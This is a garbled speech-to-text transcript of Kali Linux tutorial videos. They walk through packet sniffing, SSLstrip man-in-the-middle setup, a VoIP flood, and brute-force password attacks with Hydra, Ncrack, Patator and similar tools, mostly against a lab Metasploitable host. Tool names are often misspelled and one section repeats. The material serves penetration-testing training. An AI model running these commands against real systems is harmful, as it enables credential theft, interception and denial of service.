and enter username and password. Click on login. Now let's get back to Wireshark terminal and stop the packet capturing and go to box and type http://request.method == post. Here is a packet which contains the username and password. Now let's open this as TCP flow stream. Here is the email and password which we had entered. So that's how you can sniff password using Wireshark tool, and the condition is that the website should be HTTP, not HTTPS. HTTPS is encrypted network, so you cannot spy with Wireshark if the connection is HTTPS. So that's it in this video. Thank you for watching this video. Welcome. In this video you will see RTP insert sound, sniffing and snooping Linux. A tool to insert audio into a specified audio stream was created in August-September 2006 timeframe. The tool is named RTP insert sound. It was tested on Linux Red Hat Fedora Core 4 platform, but it is expected this tool will successfully build and execute on a variety of Linux distributions. So let's start. Open terminal and type RTP insert sound --h to see options of RTP insert sound. RTP insert sound version 2.0. Usage is given here, that is header, compression, and some option that is -a, -b. Now let's insert an audio file through the network and use verbose output that is -v. So type RTP insert sound /user share RTP insert sound /stapler.wav -v. You can see in user share RTP insert sound /stapler.wav file is present. Now click on enter. It will target interface ETH0 libfindrtp _find_rtp using pcap filter IP. So that's all in this video on RTP sound tool for sniffing and spoofing. Thank you for watching this video. Welcome. In this video we are going to learn IX flood sniffing and spoofing in Linux. A UDP inter-asterisk exchange packet was captured from an IX channel between two *IPPBX. The content of that packet is the source of the payload for the attack embodied by this tool. While the IX protocol header might not match the *PBX will attack with this tool, it may require more processing on the part of the PBX than a simply UDP flood without any payload that even resembles an IX payload. Let's open up terminal and type IX flood. Here you can see that basic usage of IX flood source name, destination name, new packets, type if config. Here you can see that our source IP address as 192.168.154.132. Let's flood the VoIP server from the source that is 192.168.154.132 to the destination that is 192.168.0.4 by sending 1000 packets. Type IX flood 192.168.154.132 space 192.168.0.4 space 1000. Here you can see that 1000 packets are sent to 192.168.0.4 host. Let's send 1 lakh packets. Here you can see that 1 lakh packets are sent to 192.168.0.4 host. That's it in this video on IX Flood, which is sniffing and spoofing tool. Thank you for watching this video.
Welcome, in this video we are going to learn URL snarf, which is sniffing tool in Linux. URL snarf outputs all requested URLs sniffed from HTTP traffic in CLF, that is common log format, used by almost all web servers, suitable for offline post-processing with your favorite web log analysis tool. Let's open up terminal and type URL snarf space -h. Here you can see that basic usage with options, usage URL snarf, options, -i interface, -p pcap file. Let's find out network interface, gateway address and IP address. If attacker just want to see the sniffed URL on the terminal, type URL snarf space -i880. Let's open a browser, open any website, URL snarf tool, capture your URL and all information. So that's it in this video on URL snarf, which is URL sniffer tool in Linux. Thank you for watching this video. Welcome, in this video we will see TCP write sniffing and snooping tool. In version 3.0, all of the packet editing functionality in TCP replay was moved to TCP write. In 3.4.1, this editing functionality was reintroduced in TCP replay with the creation of TCP replay edit. Hence, all the options listed in TCP write are both valid for TCP write and TCP replay edit. Let's start, open terminal and type TCP write space -h to see option, usage, TCP write, flag, value, name, value, the options -r to rewrite, -s to randomize, and so on. Now type cd desktop to change directory to the desktop. Running TCP write requires you to provide it an simple PCAP file and the name of the output PCAP file, which will be overwritten. Here you can see sample.pcap file in the desktop. So write TCP rewrite space ---- in file equals to sample.pcap space ---- out file equals to output.pcap and enter. Here you can see its file is output.pcap is created or overwritten on desktop. So that's it in this video on TCP write sniffing and snooping tool in Linux. Thank you for watching this video. Welcome, in this video we will see sniffing and spoofing. The basic concept of sniffing tools is as simple as wiretapping, and Linux has some popular tool for this purpose. In this video we will learn about sniffing and spoofing tools available in Kali. MITM proxy. MITM proxy is an SSL capable man-in-the-middle HTTP proxy. It provides a console interface that allows traffic flows to be inspected and edited on the fly. Go to the terminal and type MITM proxy -parameter, and for getting help on the commands, type MITM proxy -h. Here you can see different optional arguments: help, config, version, short version, host, size, out file, and so on. And proxy modes -r, -t, -u, and proxy options, raw, TCP, no server, for SSL, ciphers, verify, upstream SSL version client, and so on. Onboarding app, no app, app host, app port, client replay, that is -c, server replay, -s, -no fresh, replacement that is -replace, set headers, proxy authentication, and finally filters. So these are the options available for MITM proxy, that is man-in-the-middle attack proxy. Next, let's see Wireshark. Wireshark is one of the best data packet analyzer. It analyzes deeply the packets in frame level. You can get more information on Wireshark from their official page, that is www.wireshark.org. For opening, go to Application, Sniffing and Spoofing, Wireshark, and click on Start. Click Start and packet capturing will start. So these are the random packet generator. Let's click on it. It generates some random packets. Wireshark basically captures all the data in the network, which is basically meant for sniffing, that is sniffing the data from the network. Tons of data on the network, you can opt in here. So that's all in Kali Linux sniffing and spoofing. Thank you for watching this video. Welcome. In this video we will see Sniff Joke tool, which is meant for sniffing and spoofing in Kali Linux. Sniff Joke is application for Linux that handle transparently your TCP connection, delaying, modifying, and inject fake packets inside your transmission. Make them almost impossible to be correctly read by a passive wiretapping technology. So let's start Sniff Joke, that is transparent TCP connection scrambler. First open terminal and type sniffer --help to see options. Usage Sniff Joke. Option, that is location dir directory, user group, no TCP. Next type Sniff Joke ectl space --help. Sniff Joke ectl is controller for Sniff Joke 1. Uses Sniff Joke ect options and commands, that is address, version, timeout, help. Next type Sniff Joke -autotest space -h. Sniff Joke autotest. This script runs plugin test. Usage user bin Sniff Joke -autotest space options. This script runs plugin test along different destination OS to determine the selection of plugins and options that correctly works in the current location. Every workplace like office, home, free Wi-Fi, etc. you use need to be set up as location. Having location correctly configured is the only way to have a Sniff Joke working. Technical details will be found in options, that is -h shows this message, -l location name, -n number of replicas to be passed for the single hack, -g specify the group to privilege downgrade, -u specify the user to privilege downgrade. Next type Sniff Joke -autotest space -g, -g specify the group to privilege downgrade. Next type Sniff Joke -autotest -g root. Next type sg -commit -results space -h. Usage is user bin sg commit results options. This script is part of Sniff Joke autotest. Usually an user has not any need in use this script. Options -l target location to send remotely, -u URL which commit to, both required. Next type sg -ipt cpopt -probe space -h. Usage user bin sg -ipt cpopt -probe space option. This script is part of Sniff Joke autotest. This script is invoked by Sniff Joke -autotest and try the possible combination of IP or TCP header options for testing location.
It's required a detailed test because different ISP will handle differently these options, considering a packet acceptable or not by internal policy, router configuration, and updating frequency. By hand, this script should accept these arguments. Options -h shows this message, -w working directory, -u testing URL, and so on. Now type sj-iptcpopt-probe space -u and the URL of the site, which is opting for my own website. So try it on your own website itself only. That is, here I'm using hacking2.com. No parameters supplied. There is a reason if the user must invoke sniff joke -autotest only. Usage -user bin sj-ipcpot equals to pt-probe option. This script is part of sniff joke autotest. The script is invoked by sniff joke -autotest and try the possible combination of IP or TCP header options for the testing location. Is required detailed test because different ISP will handle different policy, router configuration, and frequency. That's all in sniff joke for sniffing and spoofing in Linux. Thank you for watching this video. Welcome. In this video we will see SSL strip, Linux sniffing and spoofing. SSL strip is a tool that transparently hijack HTTP traffic on a network, watch for HTTPS link and redirects, and then map those links into look-alike HTTP links or homograph similar HTTP links. It also supports modes of supplying a favicon, which looks like a log icon, selective logging, and session denial. SSL strip is a type of man-in-the-middle attack that forces a victim's browser into communicating with an adversary in plain text over HTTP, and the adversary proxies the modified content from an HTTPS server. To do this, SSL strip is stripping HTTPS URL and turning them into HTTP URL. How does this work? First, ARP spoof convinces a host that our MAC address is the router's MAC address, and the target begins to send us all its network traffic. The kernel forwards everything alone except for traffic destined to port 80, which it redirects to listen port. At this point, SSL strip receives the traffic and does its magic. Changes in 0.9. Bug fixes introduced in 0.8 that were preventing Gmail and other login speed enhancements. Support for stripping compressed content encoding if they slip past us. To open it, go to Application, Sniffing and Spoofing, Spoofing and MITM, inside that SSL strip. To set it up, write to forward all the 80 port communication to 8080, type IP tables -t, net-a, pre-routing -p TCP, destination port 80, -j redirect, -20 port 8080, type root -n. Start the SSL strip command for the port, that is SSL strip -l 8080. Here we can see that SSL strip 0.9 by Moxie running. So that's all in this video. Thank you for watching this video. Welcome. In this video we will see create word list with the crunch in Linux. So basically, what is word list? In password cracking technique, word list is one of the most important files for cracking password. This word list have all key combination of all possible passwords combinations. Password cracking techniques are dictionary attack. A dictionary attack uses targeted techniques of successively trying all the words in an exhaustive list called a dictionary. Second, brute force attack. In contrast with the brute force attack, where a large proportion key space is searched systematically, a dictionary attack tries only those possibilities which are most likely to succeed, typically derived from a list of words, for example, a dictionary. Hybrid attack.
It works like a dictionary attack but adds some numbers and symbols to the words from the dictionary and tries to crack the password. Slabble attack. It is a combination of both brute force attack and the dictionary attack. Fifth, rule-based attack. This attack is used when the attacker gets some information about the password. In this video, I am going to show you how to create word list with the crunch in Linux. Syntax for creating word list, that is crunch minimum maximum character set -t pattern -o filename.lst, where minimum equals to minimum character that you want to add in your word list, max is equal to maximum character that you want to add in your word list, char set equals to which character you want to add in your word list like ABCD or 1 2 3 4 5. Pattern equals to your word list pattern. For example, you want to create numbers from 98 ***, means your first 2 digit will be static and last digit will be variable. Now let's do some practical. Let's open up terminal and type crunch. You can see that crunch version is 3.6. Crunch can be create a word list based on criteria you specify. The output from crunch can be sent to the screen, file or to another program. Let's generate a word list, minimum 1 character and maximum 10 character. Type crunch 1 space 10. We can see that 1534 so and so MB word list is generated. Crunch generate 1468 and so lines of word list. Here you can see that word list is generating. Now I will stop it by pressing Ctrl+C. Let's generate minimum and max for character using given characters. Type crunch 44 0 1 2 3 4 5 6 7 8 9. You can see that total 10,000 word list is created. Let's save the word list in the file. Type crunch 2 space 2 -o root desktop wordlist.lsc. We can see that total 676 lines are generated and saved in wordlist.lst file. Let's open up the wordlist.lst file. You can see that word lists are generated here. Now I generate word list as alphanumeric data. Type crunch 2 space 2 ABCDEFGHIJKLMNOPQRST 98765432210 -o root desktop wordlist_new.lst. You can see that total 908 word list is created. You can see that the file is created, and let's open the file. You can see that word list is displayed here. So that's it in this video on creating word list with crunch in Linux. Thank you for watching this video. Welcome. In this video we will see Sparta tool in Linux. So basically, what is Sparta? Sparta is a Python graphical user interface application which simplifies network infrastructure penetration testing by aiding the penetration tester in the scanning and enumeration phase. It allows the tester to save time by having a point-and-click access to his toolkit and by displaying all tool output in a convenient way. If little time is spent setting up commands and tools, more time can be spent focusing on analyzing results. Features: run Nmap from Sparta or import Nmap XML output. Transform staged Nmap, get results quickly and achieve through coverage. Configurable context menu for each service. You can configure what to run on Discord services. Any tool that can be run from a terminal can be run from Sparta. You can run any script or tool on a service across all the hosts in a scope, just with a click of the mouse. Define automated tasks for services. Default credentials check for common services. Of course, this can also be configured to run automatically. Identify password reuse on the tested infrastructure. If any username or passwords are found by Hydra, they are stored. They are stored in internal word list which can then be used on other targets in the same network. Ability to mark hosts that you have already worked on so that you don't waste time looking at them again. Website screenshot taker so that you don't waste time on less interesting web servers. Now let's see tools. One of the beauties of Sparta is that it integrates so many tools into this one single graphical user interface. When we click on Tools tab, Sparta displays numerous tools that we can apply to this target system, including MySQL default, Nikto, SNMP enum, SMTP enum VRFY, SNMT default, SNMP check. Let's open up the Sparta. For that, Application Information Gathering, Sparta. Here I am opening using terminal. So let's open up the terminal and type Sparta. Here you see that Sparta graphical user interface is opened. To get started with Sparta, we need to provide it with a host to scan and enumerate. Click here to add host to scope. Here one window is opened. We can add the IP address or range of IP addresses to scan. Type 192.168.0.1/24. Click add to scope. Sparta will start scanning our host now. Sparta results. My subnet has more machines on it. Sparta also runs a Nikto scan on the system if it finds port 80 open. We can click on the Nikto tab to see the results of the Nikto web app vulnerability scan. We can go to the information tab. We can get more detailed information on particular highlighted system. Notice at the bottom of this screen that we get more specific information on the operating system of the target. That's it in this video on Sparta tool in Kali Linux. Thank you for watching this video. Welcome. In this video, we will learn Petator package in Kali Linux. Petator is a multi-purpose brute forcer with a modular design and a flexible usage. Let's open up terminal and type Petator. Currently, it supports FTP login, that is brute force FTP, SSH login, telnet login, SMTP login, SMTP verify, whichever you can see, from FTP login to key store pass. It basically brute force for almost all of them. Let's see now one by one. So let's start with SSH login using brute forcer SSH technique. Type Petator SSH underscore login, user is equal to root, password is equal to file 0, 0 is equal to root, desktop, password.txt. Here you can see that I created a password word list file in the desktop. Host equals to as Metasploitable machine. Let's open up victim machine. Here you can see that victim IP address as 192.168.154.131. So host equals to 192.168 and so and so. Now -x ignore fgrep equals to access denied for user. Click on enter. Here you can see that the brute force is begun. It will check all the password in password.txt file. You see that root username and password is not matched with the victim machine. Authentication failed message is displayed for all password. Let's try with another username as msfadmin. Type Petator SSH underscore login, user is equal to msfadmin, password equal to file 0, 0 equals to root, desktop, password.txt, host equals to as Metasploitable machine. Let's open up victim machine. Here you can see that the victim IP address is 192.168.154.131. So host is equal to the same 192.168 so and so. -x ignore fgrep equals to access denied for user. Click on enter. Here you can see that msfadmin as username and password is matched with the victim machine. We get response message as SSH 2.0 OpenSSH 4.7 PL Debian 8 Ubuntu L. That's it in this video on Predator package in Linux. Thank you for watching this video. Welcome, in this video we will see CEWL package password attack tool in Linux. CEWL is a Ruby app which spiders a given URL to a specified depth, optionally following external links, and returns a list of words which can be used for password crackers such as John the Ripper. CEWL also has an associated command line app, that is FAB, files already packed, which uses the same metadata. That stands for files already packed, which uses the same metadata extraction techniques to create author or creator list from already downloaded. CEWL will spider a target site and generate up to 3 lists, that is, first a word list of all unique words found on the target site, second a list of all email addresses found in mail-to links, third a list of usernames or author details from metadata found in any documents on the site. Let's open up terminal and type CEWL space -h. You can see the basic syntax of CEWL tool. CEWL options space URL. The options are --help, that is -s show the help and information of the tool, --keep, that is -keep downloaded file, and so on. For authentication, type digest or basic, that is authentication of username, authentication of password. Now to build a custom word list, we set CEWL to scraping words from website of our friends at SANS Institute. Type CEWL -w wordlist.txt -d s -m7 www.sans.org. The -w means write to the file name that follows. -d5, the depth, in this case 5, that CEWL will crawl to the website. And -m7, the minimum word length, in this case it will grab words of 7 characters minimum. This command will then crawl sans.org website to depth of 5 pages, grabbing words at least 7 letters long. After several hours of crawling through the website, CEWL places all of the words it found into the file wordlist.txt. We can then open it with any text editor. In this case, we will use LeafPad. Note that these words are reflection of the industry that SANS Institute is in, that is information security. Scan to a depth of 2, that is -d2, and use a minimum word length of 5, that is -m5. See the words to the file, that is -w docswords.txt, targeting the given URL, that is docs.kali.org. Type that completely in another new terminal and press enter. You can see that docswords.txt file list of unique words found in target site. That's it in this video on CEWL package password attack tool in Linux. Thank you for watching this video. Welcome, in this video we will see KIMPX password attack tool in Linux. KIMPX is an open source tool released under a modified version of Apache License 1.1. It can be used to quickly check for valid credentials across a network or SMB. Credential can be a combination of user or NTLM login session token. If any valid credential has been discovered across the network after its attack phase, the user is asked to choose which host to connect to and which valid credential to use. Then he will be prompted with an interactive SMB shell where the user can spawn an interactive command prompt, navigate through the remote SMB shares, list, upload, download files, create, remove files, etc. Deploy and undeploy his own service, for instance, a backdoor listing on a TCP port or incoming connections. List users' details, domains, and password policy. Let's open up terminal, type KIMPX space -h. You can see that the option for KIMPX tool --, version show program version number, -h show help message, -v verbosity level 0 to 2,
-t target address, and so on. Let's open our text editor and type victim IP address, that is 192.168.154.131 and 192.168.154.129, and so on. Save it as IP address. Let's read a list of IP address and attempt to log in as the user victim with the password of script with the verbosity level of 1 running in batch mode. So first let's read a list of IP address. For that, type kimpx-l root/desktop/ip_address.txt. So here we are reading a list of IP address. And now attempt to log in as a user victim. So for that, -u root as my username, -p, that is with the password, tor, which is the password, -v with a verbosity of 1, that is -v1, and running in a batch mode, that is -b. Here you can see that there is no credentials work on any target. Let's try with different username and password as msadmin, that is kimpx-1 root desktop ip_address.txt -u msadmin as my username, -p password also msadmin as my password with the verbosity level of 1, that is -v1, and running in the batch mode -b. Here you can see that successful login for msadmin with msadmin on 192.168.154.131 at 445. User sorted results msadmin on 192.168.154.131. So that's it in this video on KMPS password track tool in Linux. Thank you for watching this video. Welcome. In this video we will see Ncrack password crack tool in Linux. Ncrack is a high-speed network authentication cracking tool. It was built to help companies secure their networks by proactively testing all their host and networking devices for poor passwords. Security professionals also rely on Ncrack when auditing their clients. Ncrack was designed using modular approach, a command line syntax similar to the Nmap, and a dynamic engine that can adapt its behavior based on network feedback. It allows for rapid yet reliable large-scale auditing of multiple hosts. Ncrack's features include a very flexible interface, granting the user full control of network operations, allowing for very sophisticated brute forcing attacks, timing template for the ease of use, runtime interactions similar to Nmaps, and many more. Protocols supported include RDP, SSH, HTTPS, SMB, POP3, VNC, FTP, and Telnet. Let's do some practical. Let's open up terminal and type ncrack -help. Here you can see that the options, syntax for ncrack tool, target specification, that is -ix input from nmaps, -ox XML output format, -in input for nmaps, -ox normal output format, and so on. Service specifications can pass target specific service in service target notation. -p services will be applied to all non-standard notation hosts. -m will be applied to every service globally, and so on. Authentication option, -u username file, -p password file, and so on. Here you can see that basic examples: ncrack -v -user root localhost 22, ncrack -v -t5 https 192.168.0.1. Copied it and paste it in console and click enter. Here you can see
that service scanned in 3.04 seconds. Let's open up my victim machine Metasploit table 2. Here you can see that IP address 192.168.154.131. Type ncrack-vil. Here I saved IP address in IP address file. Let's open up. Here you can see that I added Metasploit table 2 IP address. Type root desktop IP_address.txt -- user root -p root desktop password.txt -p ssh cl equals to 1. We can see that ncrack is starting. It will check with all IP address. You can see that there is no password match with root victim machine. Let's try with msfadmin as username. Type ncrack-vil. Here I saved IP address in IP_address file. Here you can see that I added Metasploit table 2 IP address. Type root desktop IP_address.txt -user msfadmin -p root desktop password.txt -p ssh cl equals to 1. If I would like to explain this again, then ncrack-vil. Here I saved IP address in IP address file. Here we can see that I added Metasploit table 2 IP address, root desktop IP_address.txt -user msfadmin -p and the location of password.txt, that is root desktop password.txt -p ssh cl equals to 1. So here you can see that it discovered credentials on SSH 192.168.154.131 as msfadmin username and password. So that's it in this video on ncrack password attack tool in Linux. Thank you for watching this video. Welcome. In this video we are going to learn credump tool in Linux. Credump is a Python tool to extract various credentials and secrets from Windows registry hives. It currently extracts LM and NT hashes, cached domain passwords, LSA secrets. It essentially performs all functions that bkhive or samdump do, cache dump, and LSA dump do, but in the platform independent way. It is also the first tool that does all of these things in an offline way. Features: platform independent operation. The only input are the hive files from the system. We don't rely on any Windows functionality at all. Open source and readable implementation of Windows obfuscation algorithms used to protect LSA secrets, cache domain passwords, and a reasonably forgiving registry file parser in pure Python. Look through framework /types.py and framework Windows 32 or registry.py to see how it works. The first complete open source implementation of ADV API 32 system function 005, the version in Wine source code does not appear to allow for keys longer than 7 bits, while the Windows version does. See decrypt_secret in framework Windows 32 lsasecrets.py. Tools included in credump. Cache dump licensed under GPL demonstrate how to recover cache entry information. Username and MS Cache. Administrator or security consultants are welcome to use this program. Malicious users can't do anything with it as long as they do not have administrator privileges. Cache dump does not rely on DLL injection method used in pwdump or LSA dump 2. It creates a NT service on the fly in order to read the static LSA key from lsass.exe's process memory and deciphers the cache entries to expose the MS cache values. Cache dump's output is similar to pwdump's with of course a different hash function. A plugin for John the Ripper password cracker has been developed for offline dictionary and brute force cracking. Second, LSA dump, and third, pwdump. Let's open up terminal and type cache dump, that is dump cache credentials. You can see the basic syntax: cache dump system hive security hive. Next, type
lsc dump, here you can see that basic syntax lsc dump, system hive, security hive. Type pw dump, here you can see that the basic syntax pw dump, system hive, sam hive. Hive is a more robust implementation of hidden volume encryption, which is secure in most situations and against more capable attackers. That's it in this video on create dump tool in Linux. Thank you for watching this video. Welcome, in this video you will see Polynum password attack tool in Linux. Polynum is a Python script which uses the Impacket library from core security technologies to extract the password policy information from Windows machine. This allows a non-Windows, that is Linux, Mac OS X, etc. other operating system user to query the password policy of a remote Windows box without the need to have access to a Windows machine. Let's do some practical. Let's open up terminal and type polynum, extract the password policy from a Windows system, syntax polynum, username, password, address, protocol list. Get the password policy of the system by logging in with the provided username and password, that is msfadmin and msfadmin@192.168.154.131 using SMB port 445, that is 445 SMB. So let's type polynum msfadmin : msfadmin@, open up victim machine as Metasploit table. Here you can see that victim IP address, back to Linux, and paste it, that is 192.168.154.131, and using SMB port 445, so single quotation 445/SMB. Here domain is found as Metasploit table. Password for domain Metasploit table, minimum password length as 5, password complexity flags 000000, and so on. Logged account duration 30 minutes. So that's it in this video on Polynum password attack tool in Linux. Thank you for watching this video. Welcome, in this video we will learn Rainbow Crack in Linux. Rainbow Crack is a general purpose implementation of Philippi Oecherle's faster memory trade-off technique. It cracks hashes with rainbow tables. Rainbow Crack uses time memory trade-off algorithm to crack hashes. It differs from brute force hash crackers. A brute force hash cracker generates all possible plain text and compute the corresponding hashes on the fly, then compares the hashes with the hash to be cracked. Once a match is found, the plain text is found. If all possible plain text are tested and no match is found, the plain text is not found. With this type of hash cracking, all intermediate computation results are discarded. A time memory trade-off hash cracker need a pre-computation stage. At the time, all the plain text or hash pairs within the selected hash algorithm, char set, plain text length are computed and results are stored in files called rainbow table. It is time consuming to do this kind of computation, but once the one-time pre-computation is finished, the hashes stored in table can be cracked with much better performance than a brute force cracker. Tools included in Rainbow Crack package. First one rcrack, second RT2RTC, third RTC2RT, fourth RTSort, fifth RTGen. Let's do some practical. Open up terminal and type rcrack. Here you can see that the rcrack basic usage or syntax: rcrack rt_files -h hash, rcrack rt_files -l hash_list files, and so on, -f pwdump file -n pwdump_file. Rcrack options are rt_files part to the rainbow table, wildcard, that is star caution,
supported. -h hash, load single hash. -l hash list file, load hashes from a file, each hash in a line, and so on. You can see that examples also. rcrack star.rt-h 5d410 so on, which is a hash. Clear the terminal and type rt2rtc. The syntax is rt2rtc rt_files, rt_files, and rt_files, start point bits, end point bits. -m chunk size in MB, -p. The input rainbow table must be stored in 1 less than or equals to start point bits less than or equals to 64. That is 1 less than or equals to endpoint bits less than or equals to 64. 1 less than or equals to chunk size in MB. Type RTC to RT to convert the rainbow table from .rtc to .rt. Syntax RTC to RT, RTC_files. Type RT sort rainbow tables. Syntax RT sort RT_files, RT_files. Options -s switch to sort rainbow tables by start point, otherwise rainbow tables are sorted by endpoint. Now let's generate rainbow table using rtgen command. Type rtgen, syntax rtgen #algorithm charset plaintext _len_min, that is minimum, plaintext _len length _max, that is maximum, table _index space -bench. Here we can see that different algorithm. Type rtgen md5 lower alpha 170 1000 space 1000 0. Here you can see that rainbow table md5 lower alpha 127 _0 _1000 into 1 5 times 0 _0.rt. Hash length as 16. The plain text total as 83530, so and so. So that's all about rainbow crack in Linux. Thank you for watching this video. Welcome. In this video we will learn PAC, which is a password attack tool in Linux. PAC was developed in order to aid in a password cracking competition, Crack Me If You Can, that occurred during DEF CON 2010. The goal of this toolkit is to aid in the preparation for the better than brute force password attacks by analyzing common ways that people create passwords. After the analysis stage, the statistical database can be used to generate attack masks for tools such as OCL Hashcat. Important note, this tool itself cannot crack passwords, but helps other tools crack more passwords faster. Let's open up terminal and type statsgen-h. Generate dictionary file statistics. Here we can see that basic syntax, statsgen, options, password.txt. Options are --version shows program's version number, and exit, -h --help shows this help message and exit. -o password masks, -output equal to password, masks save masks and stats to a file, and so on. Now generate statistics for a password with a length of 10, that is minimum length equals to 10 and maximum length equals to 10, contained in the ROCU word list, that is ROCU.txt. So for this one would type stats -minimum length equals to 10 -maximum length equals to 10 password.txt. Here I saved password.txt file in desktop. StatGen tool is analyzing password in password.txt file. The length is 10⁻100%, character set, lower alpha special 66%, numeric 33%, and so on. Mask generate hashcat mask. type maskgen space -h. The basic syntax maskgen pass 0 dot masks pass 1 dot masks space options. The options are for the version health man minimum length equals to 8, maximum length equals to 8, and so on. Policy generate hashcat masks type policy gen space -hashcat. The basic syntax is policy gen space options. Options are --version, show program's version number and exit, -s show this health message and exit, --length equals to 8, password length, and so on. Generate hashcat masks with the length of 8 and containing at least one uppercase letter and at least one digit, saving the mask to a file. So for that, type policy gen, the max length of 8, that is --max length equals to 8, and containing at least one uppercase letter, that is --minimum upper 1, and at least one digit, so min minimum digit 1, and saving the mask to a file, so -o sample.hc mask. Here you can see that hashcat is generated and saved in sample.hc mask file. Let's open up sample.hc mask file. Here you can see that the hashcat masks. So that's it in this video on pack password attack tool in Linux. Thank you for watching this video. Welcome. In this video we are going to learn phrase and gesture in Linux. It's basically Phrasen and the gesture is a modular and multiprocessing passphrase cracking tool. It comes with a number of plugins, but a simple plugin API allows an easy development of new plugins. The main feature of PND are modular with use of plugins, that is multiprocessing, dictionary attack with or without permutation, uppercase, lowercase, 133t, etc. Incremental brute force attack with custom character maps, runs on FreeBSD, NetBSD, OpenBSD, Mac OS, and Linux. Let's open a browser. Here you can see that in URL www.leid.echo.info project Phrasen researcher Phrasen 1.2.2b tr.gz. Here I already downloaded Phrasen researcher tool, extract it and open up in terminal. Set terminal path as Phrasen researcher, so type change directory, that is cd desktop / Phrasen researcher 1.2.2b. Let's configure Phrasen researcher tool, type /configure with plugins. You can see that configuration is checking. Now let's again configure with libssh2, type .configure with libssh2. Here you can see that configuration start with libssh2. Now install Phrasen researcher tool, type make install. Here you can see that installation successfully installed. Type pd space -h. Here you can see that Phrasen researcher command pd is executed successfully. You can see that basic syntax pd plugin options, general options, -h print message, v voros mode, and so on. Here you can see that environment variable pd plugins directory contains the plugin. pd char map, the character for the incremental mode are taken from character list. A customized list can be specified in the environment variable. So that's it in this video on installation of Phrasen and the researcher. Thank you for watching this video. Welcome. In this video we are going to learn hash code and encrypt passwords in Linux. Let's open a browser, go to google.com, type hashcode space github. Here you see that link, that is github.com/hashcode. Click on it. Here we can see that hashcode github and copy the git URL. Back to Kali desktop,
open terminal, type git clone, paste the copied URL. Here you can see that cloning is started. Here you can see that resolving 100% is done. Let's change the terminal directory to downloaded hash code. Type cd space hash code. Type ls. Here you can see that hash code directory files. Now change file permission using chmod command. Type chmod space +x hashcode -en.py chmod +x hashcode gui.py chmod +x hashcode.py. Let's run hashcode.py file. For that, I will type python space hashcode.py. Here you can see that this tool have 12 algorithms. Let's encode password using MD5 algorithm. Type A. Let's type text encrypt in MD5. So I will type Amit space Hudar. Here you can see that encoded text for Amit Hudar. Let's try on reverse text. Type K. Let's paste the Amit Hudar encoded code. Here you can see that code is reversed. So that's it in this video on hashcode encrypt password. Thank you for watching this video. Welcome. In this video we will use DHC Hydra password cracker. There are times in which we all have the time to physically attack a Windows-based computer and obtain security account manager directly. However, there will also be time in which we are unable to do so, and this is where an online password attack proves most beneficial. Hydra supports many protocols, including FTP, HTTP, HTTPS, MySQL, MS SQL, Oracle, Cisco, Nmap, VNC, and many more. Be careful as this type of attack can be a bit noisy, which increases your chance of getting detected. A connection to the internet or intranet as well as computer that we can use as our victim is required to complete this task. Let's begin the process of cracking an online password. Go to Applications, Linux, Password Attacks, Online Attacks, Hydra GTK. We can see that Hydra started. We'll need to set our word list. Click on the password tab. We'll use a username list and a password list. Enter the location of your username and password list. Here I saved username and password files. Let's select username. Here we can see that usernames and select password file. Select loop around users and try empty password. Select try empty password checkbox. Now we will tune the attack. Under performance option, we will set the number of tasks from 16 to 2. The reasons for this is that we do not want to have so many processes running that we bring down the server. Although optional, we also want to set exit after first found pair option. Last, we'll go our target, click on the target tab and set our target protocol that we wish to attack. In our case, we are using MySQL port of our Metasploitable machine. Now let's open up my victim machine as Metasploitable2 machine. Here you can see that the IP address of my victim machine, IP address 192.168.154.131. So type 192.168.154.131. Select protocol MySQL. We execute the exploit by clicking on Start tab and pressing the Start button. We use Hydra to perform dictionary attack against our target. So Hydra works by allowing us to specify a target and using the username and password list. It attempts to brute force password by using various combination of usernames and password from both lists. Here you can see that MS admin as username and password is found. That's it in this video on Hydra online password attack. Thank you for watching this video. Welcome. In this video we will use DHC Hydra password cracker. There are times in which we all have the time to physically attack a Windows-based computer and obtain security account manager directly. However, there will also be time in which we are unable to do so, and this is where an online password attack proves most beneficial. Hydra supports many protocols, including FTP, HTTP, HTTPS, MySQL, MSSQL, Oracle, Cisco, Nmap, VNC, and many more. Be careful, as this type of attack can be a bit noisy, which increases your chance of getting detected. A connection to the internet or intranet as well as computer that we can use as our victim is required to complete this task. Let's begin the process of cracking an online password. Go to Applications, Linux, Password Attacks, Online Attacks, Hydra GTK. We can see that Hydra started. We'll need to set our word list. Click on the Password tab. We'll use a username list and a password list. Enter the location of your username and password list. Here I saved username and password files. Let's select username. Here we can see that usernames and select password file. Select loop around users and try empty password. Select try empty password checkbox. Now we will tune the attack. Under performance option, we will set the number of tasks from 16 to 2. The reasons for this is that we do not want to have so many processes running that we bring down the server. Although optional, we also want to set exit after first found pair option. Last, we'll go our target, click on the target tab and set our target protocol that we wish to attack. In our case, we are using MySQL port of our Metasploitable machine. Now let's open up my victim machine as Metasploitable 2 machine. Here you can see that the IP address of my victim machine, IP address 192.168.154.131. So type 192.168.154.131. Select protocol MySQL. We execute the exploit by clicking on Start tab and pressing the Start button. We use Hydra to perform dictionary attack against our target. So Hydra works by allowing us to specify a target. And using the username and password list, it attempts to brute force password by using various combination of usernames and password from both lists. Here you can see that msadmin as username and password is found. That's it in this video on Hydra online password attack. Thank you for watching this video. Welcome. In this video we will use DHC Hydra password cracker. There are times in which we all have the time to physically attack a Windows-based computer and obtain security account manager directly. However, there will also be time in which we are unable to do so, and this is where an online password attack proves most beneficial. Hydra supports many protocols, including FTP, HTTP, HTTPS, MySQL, MSSQL, Oracle, Cisco, Nmap, VNC, and many more. Be careful, as this type of attack can be a bit noisy, which increases your chance of getting detected. A connection to the internet or intranet as well as computer that we can use as our victim is required to complete this task. Let's begin the process of cracking an online password. To open Hydra, go to Application, Linux, Password Attack, Online Attack, Hydra, or open terminal. I will type Hydra space -h. Here you can see that Hydra has some different options, and here you can see some examples of basic syntax of Hydra tool. Now let's open up my victim OS Metasploitable 2 machine.
let's log in with username and password as msadmin. Here you can see that IP address of my victim machine is 192.168 and so. Let's go back to Kali, type hydra-l root-p root desktop password.txt -t space 6 ssh 192.168 and so. Here I tried with root as username. You can see that target is completed but zero valid password found. Let's start with msfadmin as username. Type hydra-l msfadmin -p root desktop password.txt -t 6 ssh 192.168 and so and click on enter. Here I tried with root as username. You can see that target is completed but zero valid password found. Let's start with msadmin as username. Type hydra-l msfadmin space -p root desktop password.txt -t 6 ssh 192.168 and so and click on enter. You can see that password is found as msfadmin, displayed in green font. 1 of 1 is successfully completed. So that's it in this video. Thank you for watching this video.
